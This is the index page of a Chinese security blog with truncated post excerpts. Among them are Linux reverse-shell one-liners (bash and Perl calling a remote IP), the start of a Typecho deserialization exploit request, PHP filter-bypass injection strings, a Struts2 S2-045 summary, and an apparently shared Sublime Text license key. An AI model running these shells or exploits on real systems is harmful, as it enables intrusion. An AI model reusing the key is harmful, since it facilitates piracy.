MoR03r MoR03r's Blog
Linux下反弹shell方法总结
发表于 2017-11-16 | 综合
Bash版: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Perl版: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("...

阅读全文>>

Typecho install.php 反序列化导致任意代码执行
发表于 2017-10-25 | 综合
0x00 前言 听说了这个洞,吓得赶紧去看了一下自己的博客,发现自己当初安装完就把这个文件和install目录删了,看来当初自己安全意识还是可以滴 233 0x01 Payload GET /typecho/install.php?finish=1 HTTP/1.1 Host: 192.168.211.169 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/x...

阅读全文>>

PHP中一些常见的过滤方法及绕过方式
发表于 2017-6-1 | CTF
过滤关键字   and or php代码   preg_match('/(and|or)/i',$id) 会过滤的攻击代码    1 or 1=1 1 and 1=1 绕过方式    1 || 1=1 1 && 1=1 过滤关键字   and or union php代码   preg_match('/(and|or|union)/i',$id) 会过滤的攻...

阅读全文>>

Ubuntu 16.04 安装使用 .NET Core
发表于 2017-4-29 | 综合
微软最近正式发布了.NET Core 1.0、它支持Windows、OS X和Linux三种操作系统。其中.NET Core最受瞩目,这是一款跨平台、开源且模块化的.NET平台,可以用来搭建web应用、微服务、创立应用库和控制台应用。 .NET Core的组成: .NET runtime:提供运行环境,汇编码加载,垃圾回收等基础服务。 框架库:完全整合传统的.NET标准库。提供基础数据类型和不同类型应用的基础组件等。 .NET Core SDK:相关系列的SDK工具和语言编译器 .NET Core应用的命令行...

阅读全文>>

CTF中常见图片隐写
发表于 2017-4-11 | CTF
1、常见的基本隐写 binwalk : kali自带的图片分析以及提取,很强大的作用 进入到kali改图片目录下,运行命令 binwalk sim.jpg 可以很清晰的看到图片中隐藏着一个压缩包,继续运行命令 binwalk -e sim.jpg,可以将里面的压缩包提取出来。其实提取的方式有好几种,可以使用winhex、foremost等进行提取。 foremost : 也是kali自带的一款,它不仅仅局限于图片一种模式,还可以提取流量包等等,当binwalk无法提取时,不妨试试它 Stegsolve ...

阅读全文>>

Sublime text 3 lience
发表于 2017-3-23 | 综合
—– BEGIN LICENSE —– Michael Barnes Single User License EA7E-821385 8A353C41 872A0D5C DF9B2950 AFF6F667 C458EA6D 8EA3C286 98D1D650 131A97AB AA919AEC EF20E143 B361B1E7 4C8B7F04 B085E65E 2F5F5360 8489D422 FB8FC1AA 93F6323C FD7F7544 3F39C318 D95E6480 FCCC7561 8A4A1741 68FA4223 ADCEDE07 200C25B...

阅读全文>>

Ubuntu折腾笔记
发表于 2017-3-23 | 综合
系统清理篇 系统更新 安装完系统之后,需要更新一些补丁。Ctrl+Alt+T调出终端,执行一下代码: sudo apt-get update sudo apt-get upgrade 卸载libreOffice libreoffice事ubuntu自带的开源office软件,体验效果不如windows上的office,于是选择用WPS来替代(wps的安装后面会提到) sudo apt-get remove libreoffice-common ...

阅读全文>>

Struts2-045漏洞
发表于 2017-3-10 | exploit
Struts2是个好东西 免责申明:文章中的工具等仅供个人测试研究,请在下载后24小时内删除,不得用于商业或非法用途,否则后果自负     Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵,漏洞评级为:高危。 漏洞详情:恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞进而执行系统命令。 风险等级:高风险。 漏洞风险:黑客通过利用...

阅读全文>>

打造python web 框架(五): 进行web项目架构调试
发表于 2017-2-7 | 综合
进行简易的web 架构 项目结构 ➜ webKiss tree . ├── db # db数据库目录 │ └── __init__.py ├── kiss # 框架主目录 可以放到python 的库目录,这样会支持全局调用。可以不用在项目里调用。 │ ├── Kiss.py # 框架主文件 │ └── __init__.py ├── run.py # 运行主入口 ├── static # 静态文件 │ ├── css │ ├── images │ └── js ├── templates # 网站模...

阅读全文>>

打造python web 框架(四): 采用Werkzeug + jinja2 进行架构
发表于 2017-2-7 | 综合
说明: python里有个werkzeug框架进行了WSGI规范的实用函数库。使用广泛,flask框架底层就是采用了werkzeug werkzeug: http://werkzeug.pocoo.org/ 特性: HTTP头解析与封装 易于使用的request和response对象 基于浏览器的交互式JavaScript调试器 与 WSGI 1.0 规范100%兼容 ...

阅读全文>>

TOP